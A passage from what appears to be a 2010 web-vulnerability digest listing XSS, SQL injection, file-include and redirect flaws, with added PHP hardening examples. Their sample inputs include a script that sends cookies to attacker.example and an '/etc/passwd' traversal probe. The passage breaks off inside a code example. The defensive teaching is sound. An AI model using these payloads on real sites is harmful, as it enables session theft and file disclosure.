  • Description: IBM Lotus Notes is a groupware application. It is exposed to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "names.nsf" script. Lotus Notes versions 6.x are affected.
  • Ref: http://www.securityfocus.com/bid/38880

  • 10.13.54 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: phpCAS Cross-Site Scripting
  • Description: phpCAS is an implementation of CAS (Central Authentication Service) to provide single sign-on services for web-based applications. phpCAS is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input. phpCAS version 1.1.0 is affected.
  • Ref: http://www.ja-sig.org/issues/browse/PHPCAS-52

  • 10.13.55 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Astaro Security Linux "index.fpl" Cross-Site Scripting
  • Description: Astaro Security Linux is a network security solution offering a firewall, VPN, antivirus, and intrusion detection. Astaro Security Linux is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input. Astaro Security Linux version 5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/510273

  • 10.13.56 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: agXchange ESM "ucquerydetails.jsp" Cross-Site Scripting
  • Description: agXchange ESM is an electronic safety report communication application. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "QueryID" parameter of the "ucquerydetails.jsp" script.
  • Ref: http://www.securityfocus.com/archive/1/510247

  • 10.13.57 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 CleanDB - DBAL (tmsw_cleandb) Unspecified SQL Injection
  • Description: CleanDB - DBAL (tmsw_cleandb) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. CleanDB - DBAL versions 2.1.0 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.58 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 SAV Filter Alphabetic Extension SQL Injection
  • Description: SAV Filter Alphabetic ('sav_filter_abc') is an extension for the TYPO3 content manager. The extension is exposed to an SQL injection issue because it fails to sufficiently sanitize input before using it in an SQL query. SAV Filter Alphabetic versions 1.0.8 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.59 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 Book Reviews Extension Unspecified SQL Injection
  • Description: TYPO3 Book Reviews (sk_bookreview) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Book Reviews versions 0.0.12 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.60 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 SAV Filter Months Extension SQL Injection
  • Description: SAV Filter Months (sav_filter_months) is an extension for the TYPO3 content manager. The extension is exposed to an SQL injection issue because it fails to sufficiently sanitize input before using it in an SQL query. SAV Filter Months versions 1.0.4 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.61 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 CleanDB Extension Unspecified SQL Injection
  • Description: CleanDB (nf_cleandb) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. CleanDB versions 1.0.7 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.62 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PhpMyLogon "username" Parameter SQL Injection
  • Description: PhpMyLogon is a PHP-based web application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied input to the "username" parameter before using it in an SQL query. PhpMyLogon version 2 is affected.
  • Ref: http://www.securityfocus.com/bid/38776

  • 10.13.63 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 Educator Extension Unspecified SQL Injection
  • Description: Educator (educator) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Educator versions 0.1.5 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.64 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 Wastebasket Extension Unspecified SQL Injection
  • Description: Wastebasket (mk_wastebasket) is an extension for the TYPO3 content manager. Wastebasket is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Wastebasket versions 2.1.0 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.65 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Multi Auktions Komplett System "id_auk" Parameter SQL Injection
  • Description: Multi Auktions Komplett System is a web-based shopping application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data. Specifically, this issue affects the "id_auk" parameter of the "auktion.php" script. Multi Auktions Komplett System v3 is affected.
  • Ref: http://www.securityfocus.com/bid/38793

  • 10.13.66 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 Brainstorming Extension Unspecified SQL Injection
  • Description: The Brainstorming application is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Brainstorming versions 0.1.8 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.67 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PHP-Nuke Downloads Module "lid" Parameter SQL Injection
  • Description: Downloads is a module for the PHP-Nuke content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "lid" parameter when the "file" parameter is set to "index" and the "d_op" parameter is set to "ratedownloads".
  • Ref: http://www.securityfocus.com/bid/38826

  • 10.13.68 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: phpBB2 Plus "kb.php" SQL Injection
  • Description: phpBB2 Plus is a version of the phpBB bulletin board that has been modified to include added features. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data. phpBB2 Plus version 1.53 is affected.
  • Ref: http://www.securityfocus.com/bid/38828

  • 10.13.69 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: ABO.CMS "c.php" Multiple SQL Injection Vulnerabilities
  • Description: ABO.CMS is a PHP-based content manager. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied input to the "resolution" parameter of the "c.php" script. ABO.CMS version 5.4 is affected.
  • Ref: http://www.securityfocus.com/bid/38847

  • 10.13.70 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: tenfourzero.net Shutter "admin.html" Multiple SQL Injection Vulnerabilities
  • Description: tenfourzero.net's Shutter is a photo sharing application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "albumID" and "photoID" parameters of the "admin.html" script before using the data in an SQL query. Shutter version 0.1.4 is affected.
  • Ref: http://www.securityfocus.com/bid/38849

  • 10.13.71 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: philboard "forumid" Parameter SQL Injection
  • Description: philboard is a forum implemented in ASP. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied input to the "forumid" parameter in the "buscahost_forum.asp" script. philboard version 1.02 is affected.
  • Ref: http://www.securityfocus.com/bid/38854

  • 10.13.72 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Woltlab Burning Board Teamsite Hack Plugin "userid" Parameter SQL Injection
  • Description: Teamsite Hack is a plugin for the Woltlab Burning Board web application. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "userid" parameter of the "ts_other.php" script before using it in an SQL query. Teamsite Hack versions 3.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/38870

  • 10.13.73 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Woltlab Burning Board Lexikon Plugin "id" Parameter SQL Injection
  • Description: Lexikon is a plugin for the Woltlab Burning Board web application. The component is exposed to an SQL injection issue because it fails to sanitize user-supplied data to the "id" parameter before using it in an SQL query. The current version of Lexikon is affected.
  • Ref: http://www.securityfocus.com/bid/38871

  • 10.13.74 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Pay Per Auction Watch & Bid System "id_auk" Parameter SQL Injection
  • Description: Pay Per Auction Watch & Bid System is a PHP-based auction application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied input to the "id_auc" parameter of the "auktion.php" script.
  • Ref: http://www.securityfocus.com/bid/38878

  • 10.13.75 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Mini CMS RibaFS "admin/login.php" SQL Injection
  • Description: Mini CMS RibaFS is a PHP-based content management system. The application is exposed to an SQL injection issue due to insufficient sanitization of user-supplied data to the "login" field of the "admin/login.php" script. Mini CMS RibaFS versions 1.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/38881/info

  • 10.13.76 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Powie PowieSys "shownews" Parameter SQL Injection
  • Description: PowieSys is a PHP-based web application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "shownews" parameter of the "index.php" script file before using it in an SQL query. PowieSys version 0.7.7 alpha is affected.
  • Ref: http://www.securityfocus.com/bid/38886

  • 10.13.77 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: OpenPage "index.php" SQL Injection
  • Description: OpenPage is a PHP-based content management application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. This occurs in the "id" parameter of the "index.php" script when the "pagina" parameter is set to "news".
  • Ref: http://www.securityfocus.com/bid/38888

  • 10.13.78 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_flash" Component "sid" Parameter SQL Injection
  • Description: "com_flash" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "sid" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38890

  • 10.13.79 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PHPKIT "b-day.php" Addon SQL Injection
  • Description: PHPKIT is a web portal application. PHPKIT is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "ausgabe" parameter of the "b-day.php" addon before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38891

  • 10.13.80 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: RepairShop 2 "prod" Parameter Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: RepairShop 2 is a PHP-based customer service application. The application is exposed to a cross-site scripting issue and an SQL injection issue because it fails to sanitize user-supplied input to the "prod" parameter of the "index.php" script when "b" is set to "products.details". RepairShop 2 version 1.9.023 Trial is affected.
  • Ref: http://www.securityfocus.com/bid/38907

  • 10.13.81 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Kasseler CMS News Module "id" Parameter SQL Injection
  • Description: Kasseler CMS is a PHP-based content manager. Kasseler CMS is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "index.php" script when the "module" parameter is set to "news".
  • Ref: http://www.securityfocus.com/bid/38909

  • 10.13.82 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_gds" Component "sid" Parameter SQL Injection
  • Description: "com_gds" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "storeid" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38910

  • 10.13.83 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_aml_2" Component "art" Parameter SQL Injection
  • Description: "com_aml_2" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "art" parameter before using it in an SQL query.
  • Ref: http://www.exploit-db.com/exploits/11859

  • 10.13.84 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_cx" Component "postid" Parameter SQL Injection
  • Description: "com_cx" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "postid" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38915

  • 10.13.85 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_cb" Component "cat" Parameter SQL Injection
  • Description: "com_cb" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38916

  • 10.13.86 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 SAV Filter Selectors Extension SQL Injection
  • Description: SAV Filter Selectors (sav_filter_selectors) is an extension for the TYPO3 content manager. The extension is exposed to an SQL injection issue because it fails to sufficiently sanitize input before using it in an SQL query. SAV Filter Selectors versions 1.0.4 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.87 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 TGM-Newsletter Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: TGM-Newsletter (tgm_newsletter) is a PHP-based blog component for TYPO3. The extension is exposed to multiple SQL injection and cross-site scripting issues. TGM-Newsletter versions 0.0.2 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.88 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 YATSE - Yet Another TYPO3 Search Engine Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: YATSE - Yet another TYPO3 Search Engine (yatse) is an extension for the TYPO3 content management system. The extension is exposed to multiple SQL injection and cross-site scripting issues. YATSE - Yet another TYPO3 Search Engine versions 0.3.1 and prior are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.89 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 Power Extension Manager Unspecified Information Disclosure
  • Description: TYPO3 Power Extension Manager (ch_lightem) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified information-disclosure issue. TYPO3 Power Extension Manager versions 1.0.34 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.90 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 Diocese of Portsmouth Database Extension SQL Injection
  • Description: Diocese of Portsmouth Database (sav_diocesedatabase) is an extension for the TYPO3 content manager. The extension is exposed to an SQL injection issue because it fails to sufficiently sanitize input before using it in an SQL query. Diocese of Portsmouth Database versions 0.7.12 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.91 - CVE: Not Available
  • Platform: Web Application
  • Title: Quicksilver Forums Multiple Information Disclosure Vulnerabilities
  • Description: Quicksilver Forums is a web-based forum application implemented in PHP. The application is exposed to multiple information disclosure issues. Attackers can exploit these issues to obtain sensitive information that may lead to other attacks. Quicksilver Forums version 1.4.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/510160

  • 10.13.92 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Email Input Filter PHP Code Execution
  • Description: Email Input Filter module is an email filter module for the Drupal content manager. The Email Input Filter module is exposed to a remote PHP code execution issue that occurs because the application allows users to create arbitrary content using an unspecified input format. Email Input Filter versions prior to 6.x-1.1 are affected.
  • Ref: http://drupal.org/node/745390

  • 10.13.93 - CVE: Not Available
  • Platform: Web Application
  • Title: eFront "langname" Parameter Local File Include
  • Description: eFront is a PHP-based e-learning application. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "langname" parameter of the "www/editor/tiny_mce/langs/language.php" script. eFront versions 3.5.5 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/510155

  • 10.13.94 - CVE: Not Available
  • Platform: Web Application
  • Title: VXDate Component for Joomla! Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: VXDate is a component for the Joomla! content manager. The application is exposed to a cross-site scripting issue and an SQL injection issue because it fails to sanitize user-supplied data to the "id" parameter of the "com_vxdate" component.
  • Ref: http://www.securityfocus.com/archive/1/510158

  • 10.13.95 - CVE: Not Available
  • Platform: Web Application
  • Title: eGroupware "aspell_path" Parameter Arbitrary Command Execution
  • Description: eGroupware is a web-based groupware application implemented in PHP. The application is exposed to an issue that lets attackers execute arbitrary shell commands. This issue occurs because the application fails to sufficiently sanitize user-supplied data to the "aspell_path" parameter of the "phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" script.
  • Ref: http://www.securityfocus.com/bid/38794

  • 10.13.96 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 Simple Gallery Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: Simple Gallery (sk_simplegallery) is a PHP-based blog component for TYPO3. The extension is exposed to multiple unspecified SQL injection and cross-site scripting issues. Simple Gallery versions 0.0.9 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.97 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 Security - Salted User Password Hashes Security Bypass
  • Description: TYPO3 Security - Salted user password hashes is a third-party extension for the TYPO3 content manager. The extension is exposed to an authentication bypass issue due to an unspecified error. TYPO3 Security - Salted user password hashes versions 0.2.12 and prior are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.98 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Keys Module Key Delete Form Cross-Site Request Forgery
  • Description: Keys is a module for the Drupal content management system. The module is exposed to a cross-site request forgery issue that affects the keys delete form. Keys versions prior to 6.x-2.0 are affected.
  • Ref: http://drupal.org/node/745392

  • 10.13.99 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Tag Order Taxonomy Vocabulary Name HTML Injection
  • Description: Tag Order is a PHP-based module for the Drupal content manager. The module is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input. This issue affects the Taxonomy vocabulary name field. Tag Order versions prior to 5.x-1.4 and 6.x-1.4 are affected.
  • Ref: http://drupal.org/node/745386

  • 10.13.100 - CVE: Not Available
  • Platform: Web Application
  • Title: phpMyVisites ClickHeat Plugin Unspecified Security
  • Description: phpMyVisites is a website statistics measurement application. The application is exposed to an unspecified security issue that affects the "clickheat" plugin. phpMyVisites versions prior to 2.4 are affected.
  • Ref: http://www.phpmyvisites.us/

  • 10.13.101 - CVE: Not Available
  • Platform: Web Application
  • Title: Joomla! "com_alert" Component "q_item" Parameter SQL Injection
  • Description: "com_alert" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "q_item" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38827

  • 10.13.102 - CVE: Not Available
  • Platform: Web Application
  • Title: Nensor CMS Local File Include and SQL Injection Vulnerabilities
  • Description: Nensor CMS is a PHP-based content manager. The application is exposed to multiple input validation issues. An attacker can exploit the local file include issue using directory traversal strings to view and execute arbitrary local files within the context of the web server process. Nensor CMS 2.01 is affected.
  • Ref: http://www.securityfocus.com/bid/38839

  • 10.13.103 - CVE: Not Available
  • Platform: Web Application
  • Title: Softsaurus CMS Multiple Remote File Include Vulnerabilities
  • Description: Softsaurus CMS is a PHP-based content manager. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input. Softsaurus CMS version 2.01 is affected.
  • Ref: http://www.securityfocus.com/bid/38842

  • 10.13.104 - CVE: Not Available
  • Platform: Web Application
  • Title: ikiwiki "htmlscrubber" Plugin Remote Script Code Injection
  • Description: The "ikiwiki" program is a wiki compiler. The program is exposed to a remote script injection issue because it fails to properly sanitize user-supplied input to the "htmlscrubber" plugin. Specifically, the plugin allows "data:image/svg+xml" URIs, which can contain script code. ikiwiki versions prior to 3.20100312 and 2.53.5 are affected.
  • Ref: http://ikiwiki.info/security/#index36h2

  • 10.13.105 - CVE: Not Available
  • Platform: Web Application
  • Title: chillyCMS "admin/index.php" Cross-Site Scripting
  • Description: chillyCMS is a PHP-based content manager. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "name" parameter of the "admin/index.php" script. chillyCMS version 1.0.3 is affected.
  • Ref: http://www.securityfocus.com/bid/38846

  • 10.13.106 - CVE: Not Available
  • Platform: Web Application
  • Title: Kempt SiteDone "detail.php" Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: Kempt SiteDone is a PHP-based content management application. The application is exposed to a cross-site scripting issue and an SQL injection issue because it fails to sanitize user-supplied input to the "articleId" parameter of the "detail.php" script. Kempt SiteDone version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38856

  • 10.13.107 - CVE: Not Available
  • Platform: Web Application
  • Title: Limny 2.01 Multiple Remote Vulnerabilities
  • Description: Limny is a PHP-based content manager. Limny is exposed to multiple remote issues. The attacker may exploit these issues to compromise the application, execute arbitrary code, steal cookie-based authentication credentials, gain unauthorized access to the application, modify data, or exploit latent vulnerabilities in the underlying database. Limny version 2.01 is affected.
  • Ref: http://www.securityfocus.com/bid/38859

  • 10.13.108 - CVE: Not Available
  • Platform: Web Application
  • Title: Dew-Code Dew-NewPHPLinks "lang" Parameter Multiple Local File Include Vulnerabilities
  • Description: Dew-Code Dew-NewPHPLinks is a PHP-based web application. The application is exposed to local file include issues because it fails to properly sanitize user-supplied input. Dew-Code Dew-NewPHPLinks version 2.1.0.1 is affected.
  • Ref: http://www.securityfocus.com/bid/38864

  • 10.13.109 - CVE: Not Available
  • Platform: Web Application
  • Title: Sahana "stream.php" Authentication Bypass
  • Description: Sahana is a disaster management application. The application is exposed to an authentication bypass issue. Specifically, an attacker can exploit this issue by accessing the "stream.php" script directly and without authentication. Sahana version 0.6.2.2 is affected.
  • Ref: http://www.securityfocus.com/bid/38863

  • 10.13.110 - CVE: Not Available
  • Platform: Web Application
  • Title: Joomla! "com_jeformcr" Component "view" Parameter Local File Include
  • Description: "com_jeformcr" is a component for the Joomla! content manager. The component is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "view" parameter of "com_jeformcr". All versions of com_jeformcr are affected.
  • Ref: http://www.securityfocus.com/bid/38866

  • 10.13.111 - CVE: Not Available
  • Platform: Web Application
  • Title: agXchange ESM "ucschcancelproc.jsp" Open Redirection
  • Description: agXchange ESM is an electronic safety report communication application. It is exposed to an open redirection issue due to insufficient sanitization of user-supplied input to the "returnpage" parameter of the "ucschcancelproc.jsp" script. The current version is affected.
  • Ref: http://www.securityfocus.com/bid/38879
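
Entry 10.13.111 describes a "return to" parameter that is passed to a redirect unchecked. The following added example shows a validation routine that accepts only a site-relative path, including the protocol-relative and backslash forms that a naive "does it start with a slash" test lets through. It is not agXchange ESM code (that application is JSP; the check is the same in any language), and the function name, the fallback page and the sample inputs are constructed for the illustration.

```php
<?php
declare(strict_types=1);

// Added example, not agXchange ESM code. Names and inputs are illustrative.

function safe_return_page(?string $candidate, string $fallback = '/start'): string
{
    if ($candidate === null || $candidate === '') {
        return $fallback;
    }
    // Only a site-relative path is accepted, so it must start with "/".
    // Absolute URLs ("https:...") and pseudo-schemes ("javascript:...")
    // cannot start with "/" and fail here.
    if ($candidate[0] !== '/') {
        return $fallback;
    }
    // A second "/" or "\" would make "//evil.example" or "/\evil.example",
    // which browsers resolve to another host.
    $second = $candidate[1] ?? '';
    if ($second === '/' || $second === '\\') {
        return $fallback;
    }
    // CR/LF and other control characters could inject extra response
    // headers on servers that do not strip them from Location.
    if (preg_match('/[\x00-\x1f\x7f]/', $candidate) === 1) {
        return $fallback;
    }
    return $candidate;
}

// Typical use at the end of a cancel/submit handler:
//   header('Location: ' . safe_return_page($_GET['returnpage'] ?? null));
//   exit;

// Constructed inputs of the kind an attacker would place in the parameter.
$inputs = [
    '/reports/list',
    '/reports/list?page=2',
    'https://evil.example/login',
    '//evil.example/login',
    '/\\evil.example/login',
    'javascript:alert(1)',
    "/ok\r\nSet-Cookie: x=1",
    '',
];
foreach ($inputs as $in) {
    printf("%-32s -> %s\n", addcslashes($in, "\r\n"), safe_return_page($in));
}
```

Where the set of legitimate return pages is small, an even stronger fix is to pass an index or name that the server maps to a URL, so no URL fragment ever travels through the request at all.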

  • 10.13.112 - CVE: Not Available
  • Platform: Web Application
  • Title: Lussumo Vanilla "definitions.php" Multiple Remote File Include Vulnerabilities
  • Description: Vanilla is a PHP-based discussion forum. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input. Vanilla versions 1.1.10 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/38889

  • 10.13.113 - CVE: Not Available
  • Platform: Web Application
  • Title: Stack "action" Parameter Local File Include
  • Description: Stack is an application for teaching and assessment; it uses a computer algebra system. Stack is exposed to a local file include issue because it fails to properly sanitize user-supplied input. This issue affects the "action" parameter of the "documentation.php" script. Stack versions 1.1 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/38899

  • 10.13.114 - CVE: Not Available
  • Platform: Web Application
  • Title: Secure Portal and Secure Dept Portal Page Restriction Security Bypass
  • Description: Secure Portal and Secure Dept Portal are web portal applications. Secure Portal and Secure Dept Portal are exposed to a security bypass issue because the applications fail to restrict access to certain pages. Secure Portal versions prior to 3.5.0 and Secure Dept Portal 1.2.0 are affected.
  • Ref: http://changelog.wolf-software.net/list_changelog_entries.php?groupname=secure_portal

  • 10.13.115 - CVE: Not Available
  • Platform: Web Application
  • Title: phpAuthent "useradd.php" Multiple HTML Injection Vulnerabilities
  • Description: phpAuthent is a PHP-based website authentication manager. phpAuthent is exposed to multiple HTML injection issues because it fails to properly sanitize user-supplied input. Specifically, the "name", "email" and "password" fields of the "useradd.php" script are affected. phpAuthent version 0.2.1 is affected.
  • Ref: http://www.securityfocus.com/bid/38908
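
Entry 10.13.115 is the stored variant of HTML injection: a value submitted through a form is saved and later rendered, unescaped, to whoever views the user list. The added example below contrasts that rendering with output escaping done in the right context. It is not phpAuthent code; the field names follow the advisory, while the record, the helper name h() and the table markup are constructed for the illustration.

```php
<?php
declare(strict_types=1);

// Added example, not phpAuthent code. Record and markup are constructed.

// Vulnerable: the stored value is pasted straight into the page, so a
// value containing markup becomes markup when an administrator views it.
function render_row_vulnerable(array $user): string
{
    return '<tr><td>' . $user['name'] . '</td><td>' . $user['email'] . '</td></tr>';
}

// Hardened: escape at the point of output, for the context being written.
// ENT_QUOTES escapes both quote characters so the same helper is safe inside
// attribute values; ENT_SUBSTITUTE replaces invalid byte sequences instead
// of returning an empty string; the charset argument prevents multibyte
// confusion.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_hardened(array $user): string
{
    return '<tr><td>' . h($user['name']) . '</td>'
         . '<td><a href="mailto:' . h($user['email']) . '">' . h($user['email']) . '</a></td></tr>';
}

// Constructed record of the kind an attacker would submit through useradd.php:
// the name carries a script, the email breaks out of an attribute.
$user = [
    'name'  => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    'email' => '" onmouseover="alert(1)',
];

echo render_row_vulnerable($user), "\n";
echo render_row_hardened($user), "\n";
```

The advisory also names the "password" field; a password should never be echoed back to a page at all, escaped or not, so the fix there is to stop rendering it rather than to escape it.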

  • 10.13.116 - CVE: Not Available
  • Platform: Web Application
  • Title: SMEStorage "com_smestorage" Component for Joomla! Local File Include
  • Description: The SMEStorage application is a component for the Joomla! content manager. The component is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "controller" parameter of "com_smestorage".
  • Ref: http://www.securityfocus.com/bid/38911

  • 10.13.117 - CVE: Not Available
  • Platform: Web Application
  • Title: Joomla! "com_properties" Component "controller" Parameter Local File Include
  • Description: The "com_properties" application is a component for the Joomla! content manager. The component is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "controller" parameter of "com_properties".
  • Ref: http://www.securityfocus.com/bid/38912

  • 10.13.118 - CVE: Not Available
  • Platform: Web Application
  • Title: Joomla! "com_jresearch" Component "controller" Parameter Local File Include
  • Description: The "com_jresearch" application is a component for the Joomla! content manager. The component is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "controller" parameter of "com_jresearch".
  • Ref: http://www.securityfocus.com/bid/38917
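
Entries 10.13.108, 10.13.110, 10.13.113, 10.13.116, 10.13.117 and 10.13.118 all describe the same local file include pattern (a "lang", "view", "action" or "controller" parameter spliced into an include path), and 10.13.112 the remote variant of it. The following added example shows that pattern next to an allowlisted dispatcher. It is not code from Joomla!, Dew-NewPHPLinks, Stack, Vanilla or any component named above; the controller names, the CONTROLLERS map and the probe values are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Added example, not code from any product listed above. Names are illustrative.

// Vulnerable: the request value is spliced into the path that gets included.
// "../" sequences walk out of the controllers directory (local file include);
// on PHP < 5.3.4 a NUL byte also drops the trailing ".php"; and with
// allow_url_include=On a URL makes PHP fetch and execute remote code.
function path_vulnerable(string $requested): string
{
    return 'controllers/' . $requested . '.php';   // then: require_once $path;
}

// Hardened: the parameter selects from a fixed map and no path is ever
// built from the raw value, so traversal, NUL bytes and URLs have nothing
// to act on. An unknown name yields null and the caller answers 400 or 404.
const CONTROLLERS = [
    'search'  => 'controllers/search.php',
    'listing' => 'controllers/listing.php',
];

function path_hardened(string $requested): ?string
{
    return CONTROLLERS[$requested] ?? null;
}

// Constructed probe values of the kind these advisories describe. PHP's
// query-string decoder turns %00 into a real NUL byte, written here as "\0".
$probes = [
    'search',
    '../../../../etc/passwd',
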